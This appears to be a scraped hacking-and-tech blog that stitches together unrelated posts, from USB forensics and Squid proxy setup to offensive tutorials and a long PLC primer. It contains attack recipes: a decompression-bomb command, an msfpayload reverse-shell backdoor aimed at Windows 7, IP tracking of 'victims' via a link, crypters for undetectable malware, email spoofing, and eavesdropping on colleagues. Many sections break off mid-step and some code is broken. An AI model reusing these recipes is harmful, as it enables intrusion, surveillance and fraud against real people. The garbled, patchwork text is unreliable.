Investigating USB logs and create a amazing encrypting tool.

Universal Serial Bus controller or we most familiar USB, is a main requirement these days. We put movies to our pen drives, we watch them through USB, we connect our phones, players, External drives and lots of other stuff to our USB hubs and full fill our most important requirements. But the thing we don't know is all every time we connecting a USB device to our USB hub, our OS will keep information about the date, time, ID of the device, Manufacturer of the device, Product ID, Serial number and other unique details for a particular USB device will save on our machine.

Yes that's true. All of this stuff are saved by our OS. So these records are very important in a computer forensic investigation. These information will give very important evidence for computer crime scenes.

Hacking Tutorial released from ANONYMOUS in ghostbin.com

This the hacking tutorial released by Anonymous last week on this link https://ghostbin.com/paste/jrr89#L29

First and foremost, it is important for you to understand that 'hacking' is a broad term. There are many aspects to it, most of which require several programming skills, but that shouldn't stop you from using the tools made available by the internet for you to take advantage of. Go to the HTMLdog website and learn some HTML first, it is a great website and you will progress in no time. Also, consider Python as your first programming language; it is a tradition to recommend Python to newbies because it is the fundamental and appropriate language that will kickstart you in the world of computing. So, now that you are set and ready to continue with the quest, allow me to present to you a simplistic and minimalistic reference guide. 

Analise RAM dump file

In forensic investigations it's very important thing dump the RAM's data into a file and analyze the processes / tasks that were running on the dumped time. So let's look at how we can dump the RAM's content as a raw file and how we can analyze that file for get further more details.

For this we are going to use MoonSols  windows memory toolkit. This toolkit contains with four or more related tools. But for in this case we need only one tool which is "ramdumpit.exe". We can build the raw file of our ram's dump in a particular time using this tool. Just run it and it will ask the ordinary "Are you sure?" question just give yes for it. now you will see the blahblah.raw file has been created which is the dump of our RAM. Now we need our second tool which is going to analyze our dump file.

How to use C code in Python

Python and C combination is brilliant for programmers specially who writing network tools and exploits. For this purpose there are many ways to use both of them in one code and make the use of both languages. Previous days I was looking for a easy way(not easy actually fast way to approach my object which is make use of c code inside a python code) to do this. I was noticed there are many ways to do this. Some of them are,

1. According to Extending Python with C doc (https://docs.python.org/2/extending/extending.html).
2. Some languages has built in combine with features of these two languages such as Pyrex, Cython.
3. Using ctype module.
4. Using a SWIG (Simple Wrapper Interface Generator)

There are other ways also to achieve this but I was impressed by using SWIG. It's so easy and simple to wrap the code. So here is the steps.

I'm going to wrap a simple C function called "func" on the C code "hello.c"

1 Step : Create hello.c

following is the code in hello.c

#include <stdio.h>

int func(){
printf("Hello World");
return 0;
}
 
2nd Step : Create interface file.





To add your C code to your desired language's code you need to create interface file which is input to SWIG. Here is the interface file which is "hello.i".

%module hello
%{
int func();
%}
int func();

As you can see at the first line you have to name the module you are going to create. In this case hello module will create. This is very similar to write C code. After you put brace on second line the block has been started. Inside this block you have to mention all of your headers and functions in your C code. Here I'm using C default header stdio.h so it's no need to mention in here. If you are using custom header with macros you need put it here like #include "example.h". Save the file.

3rd Step : Create setup.py file.

After 2nd step there are numerous ways to build you the shared object (so) file (in windows dll). But here I'm going to demonstrate build the so file using setup.py file. Following is the code for setup.py



#!/usr/bin/env python 
 from distutils.core import setup, Extension  
hello_module = Extension('_hello', sources=['hello_wrap.c', 'hello.c'], ) 
 setup (name = 'anyname', 
            version = '0.1', 
            author = "your name", 
            description = """docs""", 
            ext_modules = [hello_module], 
            py_modules = ["hello"], )

Be careful about bold items. First bold item type any variable name. In second bold item type "_" as prefix to your c file name. It's important. Third bold item ; when you run swig with hello.i it will generate file called "hello_wrap.c". This file is mentioned here. Forth bold item is your source code to wrap. Inside setup module fifth bold item is the variable that the first bold item. Sixth bold item is important because this module name will use when we importing module.

4th Step : run SWIG.

Type the following in shell to get the hello_wrap.c create the so file.

swig -python hello.i

5th Step : Run setup.py

To build our so file and make use the c code inside python code lets run setup.py

python setup.py build_ext --inplace

build_ext - this will build extensions
--inplace - build the so file in same directory shell opened. 



Now you can import the module that you coded from c like this

import hello

hello.func()

When you run this it will print Hello World.

Note :

Remember this. You can import the module if you are in the same directory that you have created the so file. Other wise it cannot be imported. To import module in python file while you are in different directory you have to copy the .py file, .so file and .pyc file to that directory. Then only you can run the program that you create using the module.

Creating Swap space

Swap space is like virtual memory in Windows. In Linux environment it's very important to manage memory in occasions such as OOM(out of memory). When Large programs run simultaneously this can occur if it's a server the case is worst. So we have to assign additional memory space from our hard disk to avoid OOM. But assign memory in hard disk is not a good practice because reading and writing on hard disk is very slow with compared to RAM. So using swap space or virtual memory is more convenient in SSD. Any way here is how to assign swap space on hard disk

Hack Windows 10

Windows 10 is the Microsoft's latest OS for 2015. It's so attractive and it's better than Windows 8. For me it's great. Any way in this post I'm going to show you how to hack the Windows 10. That means I'm going to tell about following things.

1. How to change the administrator password without administrator login ?
2. How to create user accounts without administrator permission ?
3. And what you should do if you forgot your live account password (If you are using your live account to login to administrator account.) ?

In windows XP, Vista, 7, and some times 8 we could use Hiren's Boot disk to achieve this. But believe me I've tried using Hiren's Boot any of password resetting or renewing or account type changing was not affected for Windows 10. So after Windows 10 HDB 15.2 will be expired.

Using WP Scan

As the SQL Map in Kali WP Scan also very valuable tool to find vulnerabilities and hack web sites. It's totally focused on Word Press. Using this we can find the exploits, vulnerabilities of web sites which are hosted in web hosting services, using Word Press.So if you noticed that you are following a website that is use Word Press this tool will be great help.

Open the Kali terminal and type

Find the Exploits for the web site

Very useful thing behind the WP Scan is using simple syntax we can list number of exploits to a given web site(running on Word Press) that related to the Word Press version. Using that information we can do many hacks to the web site. Here is that syntax

wpscan --url <URL of the web site>

Find the User names of Site admins.





The other very useful thing is using WP Scan we can find the Site Admins very easily (Site admins User name and Name). This will be very help to brute-force attacks. Here is the syntax

SQL Map for sql injection

Kali OS is a must for a pen tester today. Because it has bundled hundreds of hacking tools into one OS. It makes us easier to find the vulnerabilities and make the use of exploits.

Within those hundreds of tools this post will discus about SQL Map tool which is very useful for pen testers to find out the SQL Injection vulnerability.

SQL injections are common in every SQL database system. But in each different manner. We can do manually also a SQL injection attack. But if we tried to do it manually (without using tools) it may take very long time to get the database. Cause we have to try again and again by changing the URL. It's very crucial task. That's why SQL injection tools become more popular such as Havij, SQL ninja, SQL dump.

Note : before you use this tool you should have detected that the web server is vulnerable for SQL injection attacks. How we can get know that ? Simply type a apostrophe(') at the end of the URL(URLs which have "php?id=num" at the end.in this "num" is a numeric char 0-9) and enter. If the web server is vulnerable for SQL injection server will returns a error page which warning that our query is wrong.some times it shows what database is it and version also.

scapy for hacking

Scapy is a Python based program. It's using for packet building. Actually you can build the complete IP packet using scapy. It's very useful achieve following hacking techniques.

1. IP spooifng.
2. ARP spoofing.
3. SYN flood.
4. Traceroute.

And more more other things can be done using this tool.
First we will start from Traceroute.

Traceroute.
Traceroute is a tool used in Windows to trace the route to a particular destination address. That's means the intermediate hops situated between the destination and source. In Windows cmd simply type tracert <destination> . Then it will gives you a clear image of what are the intermediate hops. But pathping in cmd gives us comprehensive view of what are the hosts between destination and the source and also the packet loss also between each intermediate host.
This tool can be written using scapy module in python. Actually how the traceroute happens. Every IP packet has a field called ttl(time to live). This field define how many hops the packet can go. If ttl equals to 5, that's mean it can only go through 5 hops.When it received to the nearest host it will reduce the ttl value by one. So let's say we put the ttl value of a packet to 2 and we send it as a ICMP packet...Then the replies came are from the 2nd hop from the source. If we look at the received packet's source address we can determine who are the 2nd hop from the source. So following is the code to achieve these things in Python.

#! /usr/bin/python
from scapy.all import IP,UDP,ICMP
packet = IP(dst = destination add. ttl = 5) / ICMP()
reply = sr(packet)
print reply.src 

This code will print the 5 hosts between the source and the destination.

IP Spoofing.

How to make your own Decompression bomb

What is a decompression bomb.

Decompression bomb is a file which is compressed that apparently looks very small file but when it decompressed it becomes a huge file which will eat your disk space and memory to copy. It may be freeze your machine or corrupt files and may be damage to OS.

What is the technique behind this.

The technique is compression. ZIP TAR RAR ...etc. These compression tools get the files' bits and match the patterns. For these patterns they adds certain bits to identify at the decompression. Advantage of this use to make a decompression bomb.

Let's make it.

I will introduce here you 2 ways to make a Decompression bomb your self.

Using Linux

Get terminal and type as follow

dd if=/dev/zero bs=1024 count=1000000 | zip bomb.zip -

  /dev/zero is a device file which is null. This will create a 1gig null file and zip it as bomb.zip. bs is for Block Size and as count you can specify the size of the bomb. Remember to put the Dash at the end.

In this method I've tested it created 1Gb file into 1Mb zip.
Using Notepad in windows.

Using notepad also we can create a Decompression bomb. We can write a null file using Alt+255.

Open notepad, turn on num and hold Alt , type 255 with Alt. Then you can see null (zero) block written. Type this for several times , select all , copy it and paste it. Paste several times and select all again and then you can copy a big block. Like that you can create a huge txt file with zeros.

After you've create the txt you can see the size of your file. This may be 500mb or may be few Gbs. Copy the txt and make several copies of this txt in the same folder. Open the cmd in the same directory and type copy /b *.txt bomb.txt 
This will be create a one file called bomb.txt including all copies that you created. Make a zip file by this bomb.txt.

In this method i tested it created a 4Gb txt into 8Mb zip

How to Reset Linux Root password without login

Access Single User Mode (Reset Root Password)

To reset the root password of your server, you will need to boot into single user mode.
Access the Manage section of your server in the customer portal and follow these steps. The option depends on the bootloader version on the machine:

CentOS 6

1. Click [View Console] to access the console and click the send CTRL+ALT+DEL button on the top right. Alternatively, you can also click [RESTART] to restart the server.
2. You will see a GRUB boot prompt telling you to press any key - you have only a few seconds to press a key to stop the automated booting process. (If you miss this prompt you will need to restart the VM again)
3. At the GRUB prompt, type "a" to append to the boot command.
4. Add the text "single" and press enter.
5. System will boot and you will see the root prompt. Type "passwd" to change the root-password and then reboot again.

Debian, Ubuntu, CentOS 7

1. Click [View Console] to access the console and click the send CTRL+ALT+DEL button on the top right. Alternatively, you can also click [RESTART] to restart the server.
2. As soon as the boot process starts, press ESC to bring up the GRUB boot prompt. You may need to turn the system off from the control panel and then back on to reach the GRUB boot prompt.
3. You will see a GRUB boot prompt - press "e" to edit the first boot option. (If you do not see the GRUB prompt, you may need to press any key to bring it up before the machine boots)
4. Find the kernel line (starts with "linux /boot/") and add init="/bin/bash" at the end of the line
5. Press CTRL-X or F10 to boot.
6. System will boot and you will see the root prompt. Type "mount -rw -o remount /" and then "passwd" to change the root password and then reboot again.

How to Delete OR Format files unrecoverable way

Today probably every computer user know and used to get use of a recovery software to recover deleted files and folders. Those softwares are very useful when we delete some important files let's say you have a photograph that only in your PC and you've mistakenly deleted it. So then recovery software is like came from heaven. But on the other hand think you formatted your hard disk and you sold it out. And the photograph that you're bothered should be a very private one. And the guy who got your PC recover your hard disk from the same manner that you recovered your photograph. So he got your photographs and what do you think he will gonna do with it.

The most important thing with data is private and confidential which are deserved. So when we come to the point of data confidential, data recovery becomes very critical. So let's look how to remove a file forever and ever.

First we will look how files can be recovered. Actually any data on a disk / flash drive cannot be erase like you erase pencil marks on a book. When the data have written on the disk they last forever. Then you may ask "If files cannot be deleted what are we do by deleting files?". You may know File Allocation Table (FAT). (If you want to get some idea of file allocation table and what is file system means look What are File Systems). File Allocation Table has links to data on the disk with files names , attribs ,... So when we have deleted a file , actually its deleted from this FAT table. It's remove the link to the data on the disk from the label of the file. But on the disk the real data (ones and zeros) are exist and they will remain until we over write some data on top of it. The data recovery software is doing , scan for those data on the hard disk. Some times you may have seen when we scan hard / flash drive from a recovery software some file indicate as unrecoverable. Those are files which are over written by other data. When data is over written they cannot be recoverable. There is a phrase "Data cannot be deleted but can be over written".

Windows Hacking Tool INTERCEPTER

There are several windows based hacking tools very useful for day to day hackings. Intercepter is also one of that. There is a linux version also. Any way let's take look at this handy tool.

Below picture is the over look of the Intercepter.

What are File Systems and How to Open Linux Partitions in Windows

What are file systems?

As simply it is the system of Writing or Retrieving our data on/from a disk or flash drive or any other storage media in systematic way. If there is no file system, a hard drive will be only a disk with ones and zeros that can not be read by a computer because there is no way to find the data position.

Let's assume a Library with thousands of books. Normally in a library it has sections. like Science, History, Fictions, Novels etc. And in a particular section also there may be categorized sub section like Bio science, Electronic Science, Computer Science in Science section. In a particular sub section there may have a Rack or Racks with Rows and columns numbered which a particular cell get a unique combination. In a particular cell there may have 5 books. The librarian has a table of every book of the library describes in which section's in which sub section's in which rack's and in which cell is the book placed.

So if we go to this library and ask from the librarian about a book of "Beginning for Electronic circuits" she/he may look at the table and go through Science section and in Electronic sub section and find the book and locating where is the cell. So librarian will say to you "son, go to science section and then in electronic sub section.Then go to 3rd rack's AZ cell. The book you are finding is there.". So you can find the cell and get the book easily.

IP and Packet Spoofing tools

IP Spoofing Attack Tool List

If you want to see full detail of IP Spoofing, please go to the Source.
Services vulnerable to IP spoofing
Configurations and services that are vulnerable to IP spoofing:

•     RPC (Remote Procedure Call services)
•     Any service that uses IP address authentication
•     The X Window System
•     The R services suite

Most popular tools used to modify packet headers:
Tools – For Windows

How to Change MAC address of your Machine

How to change the MAC address in Windows machines

Changing MAC address in Windows machine is much easier with GUI interface. So lets start it.

Go to Network Properties.

Then click on Configure button

How to make a remote desktop connection on Linux and Windows

Here we are going to talk about how to make remote desktop connections in Linux and Windows OSs. I think you know how to establish a RDP connection to windows machine from another windows machine. So firstly i will talk about how to establish a RDP connection to a Windows machine from Linux machine.

Note : This demonstration is for Ubuntu and Kali like linux machines

RDP from Windows to Linux
  
Get the terminal. And type apt-get install xrdp

It will install the XRDP on your linux system. Then type service start xrdp
This will start the XRDP service on your linux machine.

Now in the terminal type whoami. This will show you the host name of your linux. Remember it. And type ifconfig find your ip address and keep in mind.
Go to your Windows machine and get run and type mstsc. Type your linux machine's IP and click on connect. Then a windows will come with black background popup for input username and password. Make sure in front of the Module has selected the Sesman-Xvnc. On the Username field type the Hostname of your linux. On the password type it's password (login password for your linux). Click on OK. Then RDP connection to the linux machine will come.

RDP from Linux to Windows


Install XRDP in Linux machine as above. Get the terminal and type rdesktop and enter. If it say rdesktop has to be install type apt-get intall rdesktop. Then type rdesktop [IP address] . In the [IP address] type your windows machine's IP addres and enter. Then in a new windows it will open up the remote desktop connection to the windows machine. Some times you may get an error of "Failed to connect , CredSSP required by server". For this go to your windows machine and got remote connection properties (Right click Comuter > Properties > Remote Settings >)  Under the Allow Remote connection to this computer remove the tick for Allow connections only from computers running Remote Desktop with Network Level Authentication(recomended). Its for Windows 8. In Windows 7 go to Remote connection settings and select the middle one which is Allow connections from computers running any version of Remote Desktop (less secure). Then connect again from your linux machine.

You can give any resolution for the RDP windows like this. Lets say you want 1320x1020 resolution for the RDP connection... type

rdesktop [IP Address] -g 1320x120

RDP with linux two linux machine also can be done in same manner. Type rdesktop [IP Address] in the other linux machine. You can get the Remote desktop connection.

How to speedup Android phone

Today android has covered the most of Phones Tablets and other equipments' software needs and OS. Undoubtedly Android use more percentage than IOS (up to today). So Here is best tricks to speedup your android device .Coz I'm writing this after referred many posts,forums and practically done with my android device.

1. Getting start with cleaning

As we do in our PCs cleaning is a best method to keep the speed of your all devices. Clean means delete unwanted and duplicated files from your device. As in PCs we can use tools to do this.
When your storage fill with lots of files and data device get more time to read/find the specific files. Mostly storage is consuming by duplicated files and unwanted files or apps. And also remember cache data also consuming your storage. But  the cache is important. I will come to that in next topic. So as to now remember every thing you don't need is consuming your wanted space and speed.

Delete unwanted apps.

Unwanted apps will slow down your device in many ways. They use your devices storage, CPU usage to its works, and also your internet bandwidth for updates and Sync like things. So its important to uninstall unwanted apps

You can do this in two ways. Go to your app drawer (Go to Settings > Application Manager) and surf through apps to find the apps that you are not use and do not need any more.
Or I recommend you to download Clean Master app install on your device. It's great tool to manage things in your phone. All over this post this app's features will discuss. Any way download it , install it. It will shows you the idle apps in your android device and let you to uninstall them through this app.

How to remove startups from registry

You know that it's not sufficient to avoid starting programs on startup by disabling the programs in startup option. They live in the registry. Some times those registries also should removed in-order to avoid them starting on the startup.

Get RUN and type regedit.

Now registry will open.You should go through two things. When we installing app it could be a 32 bit one or 64 bit one. The startup registry files of 32 bits apps will build in HKLM or HKCU (HKLM-HKEY_LOCAL_MACHINE , HKCU-HKEY_CURRENT_USER) , HKLM/Software/Wow6432node/Microsoft/Windows/Current Version/Run
or
HKCU/Software/Wow6432node/Microsoft/Windows/Current Version/Run

Startup registry files of 64 bit apps will build in

HKLM/Software/Microsoft/Windows/Current Version/Run
or
HKCU/Software/Microsoft/Windows/Current Version/Run

Deleting the remaining registry files of a app that you dont want to run on startup will work well. Specially with the malwares. Most malwares created to execute at the startup. Deleting registry files of that malware like this would end up the malware activities on your computer toatally.

Some Forensic Investigation Tools.

1.P2 eXplorer
P2 eXplorer is a forensic image mounting tool designed to help investigators manage and examine evidence. With P2 eXplorer, you can mount forensic images as read-only local logical and physical disks. Once mounted, you can explore the contents of the image using Windows Explorer or you can load it into your forensic analysis tool.

2.HxD
HxD is a carefully designed and fast hex editor which, additionally to raw disk editing and modifying of main memory (RAM), handles files of any size. The easy to use interface offers features such as searching and replacing, exporting, checksums/digests, insertion of byte patterns, a file shredder, concatenation or splitting of files, statistics and much more.

Get the IP of some one using a link

Go to this site
http://blasze.tk

and enter a URL to redirect the victim. Then you will receive a code to track the IP of the victim's. Use the code to get the IP of the Victim.

How to make a Squid server and apply Rules

Proxy servers operate as an intermediary between a local network and Internet. Requests from local clients for web services can be handled by the proxy server. Squid is a high-performance HTTP and FTP caching proxy server. It is also known as a Web proxy cache. As it stores data from frequently used Web pages and files, it can often give your users the data they need without their systems having to look to the Internet.

So let's begin the tutorial.

Firstly we should install the squid in our linux system.

It's different from each linux dist but here i will get the ubuntu OS for example. And there is no more difference on these steps just browse over internet to know how to install squid to your linux OS.

Ok get the terminal and type

apt-get install squid3

As i said this is for ubuntu. apt-get install will remains as same in other Linux OSs. But dunno about squid.

Then we have to set a static IP to our server. Go to System Settings and Networks. You can change the IP, Gateway, DNS there without bothering of the commands in the terminal.

To check surely the Squid has installed in the system go to etc folder in file system or root. Try to find something like squid. In this case it's "squid3".

Go to the terminal and type

sudo nano /etc/squid3/squid.conf

Using this command we are going to open the squid.conf with nano for editing purpose. 

Then you will see a more than 5000 lines of doc in there.

press ctrl+w and searching menu will appear. type visible_hostname. It will go to the point that phrase exist and when you slowly scroll down you will see under the  default: , after the visible_hostname localhost or something. Give it a desired name or it's better to use your machine host name (type in the terminal hostname and enter.)

Again press ctrl+w and type to search tag: acl.

now we are going to build access control list. In this scenario i'm going to do this.

• block internet to 192.168.100.250
• allow internet to all of other network users
• but block www.facebook.com for every user

So lets we write a ACL to achieve these settings

scroll down after pointing the tag: acl. after default: you will see there is a acl as "acl all src all".This is default. Now i'm gonna write following ACLs.

acl deny_host src 192.168.100.250

acl allow_network src 192.168.100.0/24

acl deny_web dstdomain "/etc/squid3/deny_web"

acl all src all  - this is default one

src=source dst=destination dstdomain=destination domain

This is how we write acl to achieve above internet filtering. In the last acl we have open a acl called "deny_web" and we suggest it to look for certain destination domains where in /etc/squid3/deny_web. This was not in that folder but we are creating this to add the domains that we want to block. When you go to that directory you can see deny_web.conf file has there.

Are we done???

no we have to assign those ACLs to http access list. In acl list we are only saying to the squid "hey squid you are going inspect on these elements with these parameters". How we say to squid "don't allow these elements but you should allow these eliments through you". This is how it's gonna happen.

again ctrl+w search for tag: http_access. scroll down and after default: you will see there already an access rule saying http_access deny all. Remember this is the most important part. You should aware about this allow and deny. keep the http_access deny all at the bottom every time. It should be there. Or else there should be allow all. But if we want to permit only trusted connections and we want to abort all others deny all is huge privilege. Remember, squid read this rules top to bottom. So top one gets high priority.I will say you a simple trick to get easy with these rules.

Let assume you are in a position which is all post cards from your country(let say US) inspected by you. You got a following list to filter out the post cards.

• Deny post cards from New York.
• Deny post cards to new delhi in India
• Allow post cards from America
• Deny any

Let's say accidentally you got a post card that has "from: Ottawa,Canada to: colombo,sri lanka

ok you look at the list will see is it from new york? no.Is it to delhi in India? no. Is it from America? no. Then you see deny any. So you drop the post card. Let's say you are getting post card "from : Virginia,America to : Delhi,India". So you look at the list...Is it from New york? no. Is it to Delhi in India? oops.yes. it is. So you drop it. Because it says deny post cards to New Delhi in India. The important thing is you are not going to look at the third rule. "Allow post cards from America". Because you give high priority for top rules. Is it from America? yes it is. But it was not in the top of the other rules. So now you have dropped it. The Squid server (and most of ACLs) following like this method. It's agree with the first rule that's gonna be "true" with the situation by looking IP addresses, domain names, ports and other things inside the request packets and it will pass through it or block.

So let's make the Http_access list

http_access deny deny_host

http_access deny deny_web

http_access allow allow_network

http_access deny all

ok now you finish.

press ctrl+x and ask are you sure to save this changes. Give Y and press enter.

Now you should input what sites are going to block under the deny_web acl. To do that get the terminal and type sudo nano /etc/squid3/deny_web

then enter the web site to block. As to our example www.facebook.com. Type it and ctrl+x press y to save and press enter.

now you are done. Go to client machines and go to Internet Properties > Connections > LAN Settings . Tick "Use a proxy server for your LAN" and enter the IP of the server. And the port you can find go to server get the terminal and type nano /etc/squid3/squid.conf and ctrl+w , search for http_port. 
There you will see what port squid is listening. Enter that port on the port: text box of proxy settings of the client machine. So check it out.

Hack Windows machines using a trojan made by Kali

Hack Any Windows 7 With Metasploit

In this tutorial I will exploit a Windows 7 Sp1 OS using Metasploit. I will be using the exploit/multi/handler module which “provides all of the features of the Metasploit payload system to exploits that have been launched  outside of the framework“
Before we fire up Metasploit, we need to create a payload in order to gain a meterpreter shell. To create a payload type this in the terminal without the quotes:


msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe




I used port 4444 (you can choose your own port) for the LPORT which is the listening port and set the LHOST to the IP of the remote attacker which is obviously your Local IP address, my IP is 192.168.10.5.

How to look what's browsing your colleague (Man in the middle attack)

How about you can eavesdrop what are your office colleagues browsing on Internet...

To do this we are using basically 2 tools in kali.

1. Ettercap
2. Xplico

Xplico is not coming inbuilt manner in kali. In Back track it's in-built. For kali you have to install it. So to do it follow..

type in Terminal,,,

apt-get update

apt-get install xplico

Now go to Application > kali linux > Information Gathering > Traffic Analysis 

There you will see "Xplico" , "Xplico start" , "Xplico stop"

To start Xplico firstly you have to start Apache2

APK decompile and recompile

Go to this site to download the relevant tools.

http://forum.xda-developers.com/showthread.php?t=2251719

download the full   Apktool & baksmali/smali + Signer for all GB/ICS/JB/KK ROM v3 (4.4 Kitkat support/optimized)

• extract it to a desired folder.
• download the framework-res.apk and copy it to the same place that extracted.
• And also copy paste the .apk file.
• shift+right click on the window.
• click open command window here.
• cmd will open now.
• type on cmd apktool if framework-res.apk
• then type apktool d "your apk file name"
• press enter, it will have been decompiled and there will be a new  folder which contains the decompiled files.

to recompile the edited apk folder content...get cmd and type

• apktool b -f -d "your apk file name"
• go to the folder that contents have of the real apk (decompiled) and go to the dist folder. There will have the apk file.

Browser attacks using BeEf

To this browser attack gonna use not only the Beef but also Metasploit.

Open shell, type and go as follows..

cd /usr/share/beef-xss

ls

in the list you can see config.yaml file. Copy the name and paste the name after nano.

nano config.yaml

scroll down and look at "metasploit enable : false"
you have to erase the "false" and make it "true"
then its looks like enable : true
press ctrl + x
type y
press enter

continue typing

Hiding Malware from the Anti-virus

Creating Malware

You can create the malware for this test using the Apocalypse RAT. It's easy to build RATs. Don't need to explain how you will know after download it.

Crypters

Normally to made the malware undetectable crypters are used. but the case is when a crypter is built by programmer and when it's getting to use over the world, it becomes popular and anti-virus system getting the signatures of its and the files created using that crypter will detected by anti-virus systems. So a crypter which popular will not survive for a long.FUD (Fully UnDetectable) manner.

So what we gonna do

There is a crypter called "Aegis crypter". The important of this crypter is it's updating the stubs and also there are numerous features using to bypass the anti-virus. So this gonna be a greate crypter for creating FUD malwares.

It can download here.

How to spoof Email address

What is Email spoofing..

Email spoofing is send an email to a specific recipient as it was sent FROM a different person's email address. If i want to send a fake mail to sample1@email.com as it was sent from sample2@email.com , this technique becomes handy.

Try this in your office.

Step 1

Open cmd and telnet your mail server with your outgoing mail port. Mostly the outgoing mail port should be 25 (SMTP port).

ex:

If the email to be spoofed is in the mail server on mail.office.com and it's outgoing mail port is 25 type as follows on cmd

telnet mail.office.com 25

and enter.

Obfuscation: Malware’s best friend

Here at Malwarebytes, we see a lot of malware. Whether it’s a botnet used to attack web servers or a ransomware stealing your files, much of today’s malware wants to stay hidden during infection and operation to prevent removal and analysis. Malware achieves this using many techniques to thwart detection and analysis—some examples of these include using obscure filenames, modifying file attributes, or operating under the pretense of legitimate programs and services. In more advanced cases, the malware might attempt to subvert modern detection software (i.e. MBAM) to prevent being found, hiding running processes and network connections. The possibilities are quite endless.

Despite advances in modern malware, dirty programs can’t hide forever.  When malware is found, it needs some additional layers of defense to protect itself from analysis and reverse engineering.  By implementing additional protection mechanisms, malware can be more difficult to detect and even more resilient to takedown.  Although a lot of tricks are used to hide malware’s internals, a technique used in nearly every malware is binary obfuscation.

Obfuscation (in the context of software) is a technique that makes binary and textual data unreadable and/or hard to understand.  Software developers sometimes employ obfuscation techniques because they don’t want their programs being reverse-engineered or pirated.

What Is A Programmable Logic Controller (PLC)?    What Is A PLC? A PROGRAMMABLE LOGIC CONTROLLER (PLC) is an industrial computer control system that continuously monitors the state of input devices and makes decisions based upon a custom program to control the state of output devices. Almost any production line, machine function, or process can be greatly enhanced using this type of control system. However, the biggest benefit in using a PLC is the ability to change and replicate the operation or process while collecting and communicating vital information. Another advantage of a PLC system is that it is modular. That is, you can mix and match the types of Input and Output devices to best suit your application.  History of PLCs The first Programmable Logic Controllers were designed and developed by Modicon as a relay re-placer for GM and Landis. These controllers eliminated the need for rewiring and adding additional hardware for each new configuration of logic. The new system drastically increased the functionality of the controls while reducing the cabinet space that housed the logic. The first PLC, model 084, was invented by Dick Morley in 1969 The first commercial successful PLC, the 184, was introduced in 1973 and was designed by Michael Greenberg.    What Is Inside A PLC? The Central Processing Unit, the CPU, contains an internal program that tells the PLC how to perform the following functions: Execute the Control Instructions contained in the User's Programs. This program is stored in "nonvolatile" memory, meaning that the program will not be lost if power is removed Communicate with other devices, which can include I/O Devices, Programming Devices, Networks, and even other PLCs. Perform Housekeeping activities such as Communications, Internal Diagnostics, etc.  How Does A PLC Operate? There are four basic steps in the operation of all PLCs; Input Scan, Program Scan, Output Scan, and Housekeeping. These steps continually take place in a repeating loop. Four Steps In The PLC Operations 1.) Input Scan Detects the state of all input devices that are connected to the PLC 2.) Program Scan Executes the user created program logic 3.) Output Scan Energizes or de-energize all output devices that are connected to the PLC. 4.) Housekeeping This step includes communications with programming terminals, internal diagnostics, etc... These steps are continually processed in a loop.  What Programming Language Is Used To Program A PLC? While Ladder Logic is the most commonly used PLC programming language, it is not the only one. The following table lists of some of languages that are used to program a PLC. Ladder Diagram (LD) Traditional ladder logic is graphical programming language. Initially programmed with simple contacts that simulated the opening and closing of relays, Ladder Logic programming has been expanded to include such functions as counters, timers, shift registers, and math operations. Function Block Diagram (FBD) - A graphical language for depicting signal and data flows through re-usable function blocks. FBD is very useful for expressing the interconnection of control system algorithms and logic. Structured Text (ST) – A high level text language that encourages structured programming. It has a language structure (syntax) that strongly resembles PASCAL and supports a wide range of standard functions and operators. For example; If Speed1 > 100.0 then     Flow_Rate: = 50.0 + Offset_A1; Else     Flow_Rate: = 100.0; Steam: = ON End_If; Instruction List (IL): A low level “assembler like” language that is based on similar instructions list languages found in a wide range of today’s PLCs. LD MPC LD ST RESET: ST   R1 RESET PRESS_1 MAX_PRESS LD    0 A_X43   Sequential Function Chart (SFC) A method of programming complex control systems at a more highly structured level. A SFC program is an overview of the control system, in which the basic building blocks are entire program files. Each program file is created using one of the other types of programming languages. The SFC approach coordinates large, complicated programming tasks into smaller, more manageable tasks.  What Are Input/Output Devices? INPUTS OUTPUTS – Switches and Pushbuttons – Sensing Devices   • Limit Switches • Photoelectric Sensors • Proximity Sensors – Valves – Motor Starters – Solenoids – Acuators – Conditon Sensors – Encoders   • Pressure Switches • Level Switches • Temperature Switches • Vacuum Switches • Float Switches – Horns and Alarms – Stack lights – Control Relays – Counter/Totalizer  – Pumps  – Printers – Fans  What Do I Need To Consider When Choosing A PLC? There are many PLC systems on the market today. Other than cost, you must consider the following when deciding which one will best suit the needs of your application. Will the system be powered by AC or DC voltage? Does the PLC have enough memory to run my user program? Does the system run fast enough to meet my application’s requirements? What type of software is used to program the PLC? Will the PLC be able to manage the number of inputs and outputs that my application requires? If required by your application, can the PLC handle analog inputs and outputs, or maybe a combination of both analog and discrete inputs and outputs? How am I going to communicate with my PLC? Do I need network connectivity and can it be added to my PLC? Will the system be located in one place or spread out over a large area?  PLC Acronyms The following table shows a list of commonly used Acronyms that you see when researching or using your PLC. ASCII American Standard Code for Information Interchange BCD Binary Coded Decimal CSA Canadian Standards Association DIO Distributed I/O EIA Electronic Industries Association EMI ElectroMagnetic Interference HMI Human Machine Interface IEC International Electrotechnical Commission IEEE Institute of Electrical and Electronic Engineers I/O Input(s) and/or Output(s) ISO International Standards Organization LL Ladder Logic LSB Least Significant Bit MMI Man Machine Interface MODICON MOdular DIgital CONtoller MSB Most Significant Bit PID Proportional Integral Derivative (feedback control) RF Radio Frequency RIO Remote I/O RTU Remote Terminal Unit SCADA Supervisory Control And Data Acquisition TCP/IP Transmission Control Protocol / Internet Protocol   portions of this tutorial contributed by www.modicon.com and www.searcheng.co.uk A small number of U.S. based tech companies design, manufacture and sell PLC modules. Advanced Micro Controls Inc (AMCI) is such a company, specializing in Position Sensing interfaces and Motion Control modules. The company's products are listed below for your reference: AMCI PLC Modules Index: Allen-Bradley | GE Fanuc | Schneider (please scroll to view)   Allen-Bradley: ControlLogix PLC CompactLogixPLC MicroLogix 1500 PLC POINT I/O    Analog Inspection    Resolver Interface    SSI Interface    PLS Control    Stepper Control    Resolver Interface    PLS Control    SSI Interface    Stepper Control    Resolver Interface    PLS Control    SSI Interface    Stepper Control    Stepper Control   SLC500 PLC PLC-5 PLC        Resolver Interface    LDT/SSI Interface    PLS Control    EasyPack Series    PressPRO Series    Resolver Interface    LDT/SSI Interface    PLS Control    EasyPack Series    PressPRO Series       GE Fanuc: GE Fanuc 90-30 Series PLC GE Fanuc 90-70 Series PLC        Resolver Interface    SSI/LDT Interface    Resolver Interface    SSI/LDT Interface    PLS Controllers       Schneider Automation: Modicon Quantum PLC Square D SY/MAX PLC        Resolver Interface    Resolver Interface